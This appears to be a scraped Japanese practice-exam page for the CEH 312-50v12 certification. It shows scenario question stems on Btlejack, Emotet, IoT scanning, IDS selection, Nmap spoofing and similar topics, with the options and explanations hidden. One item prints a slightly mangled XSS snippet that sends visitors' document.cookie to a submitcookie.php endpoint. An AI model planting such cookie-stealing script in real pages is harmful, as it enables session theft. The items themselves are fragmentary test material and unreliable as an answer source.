312-50v12日本語 無料問題集「ECCouncil Certified Ethical Hacker Exam (312-50v12日本語版)」

組織内のすべての Windows ベースのコンピューターに BitLocker 暗号化が実装されています。誰かが暗号化キーを紛失するのではないかと心配しています。そのため、Active Directory からキーを回復するメカニズムが実装されました。このメカニズムは暗号化で何と呼ばれますか?

プロのハッカーである Clark は、自動化ツール Btlejack とハードウェア ツール micro:bit を使用して Btlejacking 攻撃を実行しようとしました。この攻撃により、Clark は接続されたデバイス間で共有される機密情報を乗っ取り、読み取り、エクスポートすることができました。この攻撃を実行するために、Clark はさまざまな btlejack コマンドを実行しました。Clark が接続を乗っ取るために使用したコマンドは次のうちどれですか。

ペンテスターの Jude は、ファイアウォール、ルーター、サーバーなどのデバイスを使用して、ハッカーの視点からネットワークを調査し、外部からアクセス可能なエクスプロイトと脆弱性を特定しました。このプロセスで、ネットワーク セキュリティ攻撃の脅威を推定し、企業ネットワークのセキュリティ レベルを決定しました。
Jude が組織に対して実行した脆弱性評価の種類は何ですか?

解説: (JPNTest メンバーにのみ表示されます)
大手の携帯電話およびデータ ネットワーク オペレータには、ネットワーク要素を収容するデータ センターがあります。これらは基本的に、Linux で実行される大型コンピュータです。データ センターの境界は、ファイアウォールと IPS システムで保護されています。
この設定に関する最善のセキュリティ ポリシーは何ですか?

プロのハッカーであるアリスは、ある組織のクラウド サービスをターゲットにしました。彼女はスピア フィッシング メールを送信してターゲットの MSP プロバイダーに侵入し、カスタム マルウェアを配布してユーザー アカウントを侵害し、クラウド サービスへのリモート アクセスを取得しました。さらに、彼女は自分の MSP アカウントを使用してターゲットの顧客プロファイルにアクセスし、顧客データを圧縮して MSP に保存しました。そして、この情報を使用して、ターゲットの組織に対してさらに攻撃を開始しました。上記のシナリオでアリスが実行したクラウド攻撃は次のどれですか。

解説: (JPNTest メンバーにのみ表示されます)
プロのハッカーであるメイソンは、ある組織を標的にし、悪意のあるスクリプトを通じて Emotet マルウェアを拡散します。
被害者のデバイスに感染した後、メイソンはさらに Emotet を使用して、ローカル ネットワーク内外に感染を広げ、できるだけ多くのマシンを侵害しました。このプロセスで、メイソンは自己解凍型 RAR ファイルであるツールを使用して、書き込み可能な共有ドライブなどのネットワーク リソースに関連する情報を取得しました。
上記のシナリオでメイソンが使用したツールは何ですか?

解説: (JPNTest メンバーにのみ表示されます)
プロのハッカーであるジョンは、多国籍企業である Cyber​​Sol Inc. をターゲットにしました。彼は、デフォルトの認証情報を使用しており、さまざまなハイジャック攻撃に対して脆弱な、ターゲット ネットワークに接続された IoT デバイスを発見することにしました。この目的のために、彼は自動化ツールを使用して、ターゲット ネットワークをスキャンし、特定の種類の IoT デバイスを探し、工場出荷時に設定されたデフォルトの認証情報を使用しているかどうかを検出しました。上記のシナリオでジョンが使用したツールは何ですか?

プロのハッカーであるジョンは、有名な組織に対してネットワーク攻撃を実行し、ターゲット ネットワークへの不正アクセスを獲得します。彼は、長時間検出されることなくネットワーク内に留まり、組織を妨害することなく機密情報を入手します。ジョンが使用する攻撃手法は次のどれですか。

解説: (JPNTest メンバーにのみ表示されます)
ある組織では、侵入検知システム (IDS) とファイアウォールを導入しているにもかかわらず、侵入の試みが発生しています。認定倫理ハッカーとして、侵入検知プロセスを強化し、より優れたルールベースのアプローチを推奨するよう求められています。IDS は Snort ルールを使用しており、推奨される新しいツールはそれを補完できるはずです。ルール生成用の追加ツールとともに YARA ルールを使用することを提案します。この目的に最適なツールは次のどれですか。また、その理由は何ですか。

解説: (JPNTest メンバーにのみ表示されます)
リスク評価方法論の次のステップのうち、脆弱性の特定に関係するものはどれですか?

どのタイプのマルウェアが、あるシステムから別のシステムへ、またはあるネットワークから別のネットワークへと拡散し、感染したシステムにウイルスが与えるのと同様の種類の損害を引き起こしますか?

Tremp は IT セキュリティ マネージャーであり、自分の小さな会社に IDS を導入することを計画しています。彼は、次の特性を持つ IDS を探しています。 - 攻撃の成功または失敗を検証する - システム アクティビティを監視する - ネットワーク ベースの IDS が検出できない攻撃を検出する - ほぼリアルタイムの検出と応答 - 追加のハードウェアが不要 - 導入コストが低い Tremp の要件に最適な IDS のタイプはどれですか。

SafePath Corp のサイバーセキュリティ コンサルタントとして、安全な電子メール通信システムの実装を任されています。重要な要件は、機密性と否認防止性の両方を保証することです。さまざまな暗号化方法を検討した結果、対称暗号化と非対称暗号化を組み合わせて使用​​することを検討しています。ただし、どの暗号化手法が目的に最も適しているかはわかりません。これらの要件を満たすには、次のオプションのどれを選択しますか。

解説: (JPNTest メンバーにのみ表示されます)
Spears Technology, Inc. のネットワーク管理者は、デフォルト ゲートウェイの Cisco ルーターのアクセス リストを次のように設定しました。
あなたは、ネットワーク上でセキュリティ テストを実施するために雇われました。
SNMP クラック ツールを使用して、SNMP コミュニティ文字列をブルート フォース攻撃することに成功しました。
ルータに設定されているアクセス リストにより、正常な接続を確立できなくなります。
ルータから Cisco 設定を取得したいのですが、どうすればよいでしょうか?

正解:B、C 解答を投票する
あなたは侵入テスト担当者で、特定のサーバーでスキャンを実行しようとしています。クライアントと署名した契約書には、スキャンに関する次の特定の条件が含まれています。「攻撃者は、偽装されたソース IP アドレスのセットを使用して、サーバー上のすべてのポートを複数回スキャンする必要があります。」このスキャンを実行するために Nmap を使用するとします。この要件を満たすには、どのフラグを使用しますか?

解説: (JPNTest メンバーにのみ表示されます)
ある日、ジュディはフォーラムを作成しました。彼女は、あるユーザーがコメントを書かずに奇妙な画像を投稿していることを発見しました。
彼女はすぐにセキュリティの専門家に電話し、その画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</スクリプト>
画像をクリックしたユーザーにはどのような問題が発生しましたか?

解説: (JPNTest メンバーにのみ表示されます)
サイバーキルチェーンの 3 番目のステップ (配信) の最も適切な例はどれですか。

弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間:( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート:現在連絡